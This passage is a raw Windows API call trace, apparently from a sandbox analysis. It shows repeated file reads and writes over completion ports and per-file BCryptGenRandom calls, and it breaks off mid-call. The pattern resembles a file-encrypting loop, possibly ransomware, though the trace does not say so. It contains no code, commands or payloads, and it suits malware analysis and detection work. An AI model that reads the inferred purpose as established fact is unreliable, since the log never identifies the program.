[0141.859] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe8c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.859] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.859] CloseHandle (hObject=0x338) returned 1 [0141.859] free (_Block=0x3df0008) [0141.860] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.868] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.869] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0141.869] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.869] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0141.869] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.869] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.870] free (_Block=0x3e305b8) [0141.870] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.870] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.870] free (_Block=0x1fa91d0) [0141.870] free (_Block=0x77d7a8) [0141.870] free (_Block=0x1fa90b8) [0141.870] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.870] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.871] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xdf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.871] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.910] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x258c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.911] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.911] CloseHandle (hObject=0x338) returned 1 [0141.911] free (_Block=0x3df0008) [0141.911] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.929] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.930] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0141.930] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.930] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0141.931] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.931] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.931] free (_Block=0x3e305b8) [0141.931] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.931] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.931] free (_Block=0x1fa91d0) [0141.931] free (_Block=0x77d7a8) [0141.931] free (_Block=0x1fa90b8) [0141.931] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.931] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.937] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.938] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0141.938] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.938] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0141.938] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.939] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.939] free (_Block=0x3e305b8) [0141.939] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.939] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.939] free (_Block=0x1fa91d0) [0141.939] free (_Block=0x77d7a8) [0141.939] free (_Block=0x1fa90b8) [0141.939] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0141.939] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.943] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1790, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.943] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.952] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.952] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0141.952] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.953] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0141.953] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.953] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.953] free (_Block=0x3e305b8) [0141.953] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.953] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.954] free (_Block=0x1fa91d0) [0141.954] free (_Block=0x77d7a8) [0141.954] free (_Block=0x1fa90b8) [0141.954] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0141.954] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.962] CloseHandle (hObject=0xec) returned 1 [0141.963] free (_Block=0x1ff1e60) [0141.963] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.972] ReadFile (in: hFile=0x170, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x1f40, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0141.978] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.988] CloseHandle (hObject=0x170) returned 1 [0141.988] free (_Block=0x3e70008) [0141.988] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0141.998] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x4060, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0141.998] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0142.010] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1918, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0142.020] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0142.032] ReadFile (in: hFile=0x3cc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x1068, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0142.040] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0142.105] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x1f10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0142.105] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0142.112] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.112] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0142.112] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.112] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0142.113] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.113] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.113] free (_Block=0x3e305b8) [0142.113] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.113] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0142.113] free (_Block=0x1fa91d0) [0142.113] free (_Block=0x77d7a8) [0142.113] free (_Block=0x1fa90b8) [0142.113] WriteFile (in: hFile=0xec, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0142.114] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0142.117] CloseHandle (hObject=0x308) returned 1 [0142.118] free (_Block=0x3df0008) [0142.118] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0142.137] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.138] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0142.138] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.139] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0142.139] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.139] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.139] free (_Block=0x3e305b8) [0142.139] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.139] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0142.139] free (_Block=0x1fa91d0) [0142.139] free (_Block=0x77d7a8) [0142.139] free (_Block=0x1fa90b8) [0142.139] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0142.139] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0142.148] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.149] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0142.149] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.149] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0142.150] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.150] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.150] free (_Block=0x3e305b8) [0142.150] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.150] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0142.150] free (_Block=0x1fa91d0) [0142.150] free (_Block=0x77d7a8) [0142.150] free (_Block=0x1fa90b8) [0142.150] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0142.150] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0142.153] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.153] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0142.154] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.154] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0142.154] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.154] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.154] free (_Block=0x3e305b8) [0142.154] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.154] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0142.154] free (_Block=0x1fa91d0) [0142.154] free (_Block=0x77d7a8) [0142.155] free (_Block=0x1fa90b8) [0142.155] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0142.155] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0142.161] CloseHandle (hObject=0x3cc) returned 1 [0142.162] free (_Block=0x1ff1e60) [0142.162] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0142.170] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.170] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.170] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0142.170] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.170] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.170] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0142.171] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.171] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.171] free (_Block=0x3e305b8) [0142.171] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.171] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0142.171] free (_Block=0x1fa91d0) [0142.171] free (_Block=0x77d7a8) [0142.171] free (_Block=0x1fa90b8) [0142.171] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0142.171] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0142.174] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.174] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0142.174] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.175] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.175] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0142.175] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.175] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.175] free (_Block=0x3e305b8) [0142.175] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.175] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0142.175] free (_Block=0x1fa91d0) [0142.175] free (_Block=0x2071c20) [0142.175] free (_Block=0x1fa90b8) [0142.175] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0142.176] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0142.177] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1b68, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0142.185] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0142.191] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.191] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0142.191] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.191] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0142.192] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.192] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.192] free (_Block=0x3e305b8) [0142.192] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.192] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0142.192] free (_Block=0x1fa91d0) [0142.192] free (_Block=0x77d7a8) [0142.192] free (_Block=0x1fa90b8) [0142.192] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0142.192] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0142.208] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xbf4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0142.208] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0142.208] CloseHandle (hObject=0x338) returned 1 [0142.208] free (_Block=0x3df0008) [0142.208] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0142.230] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xc44, 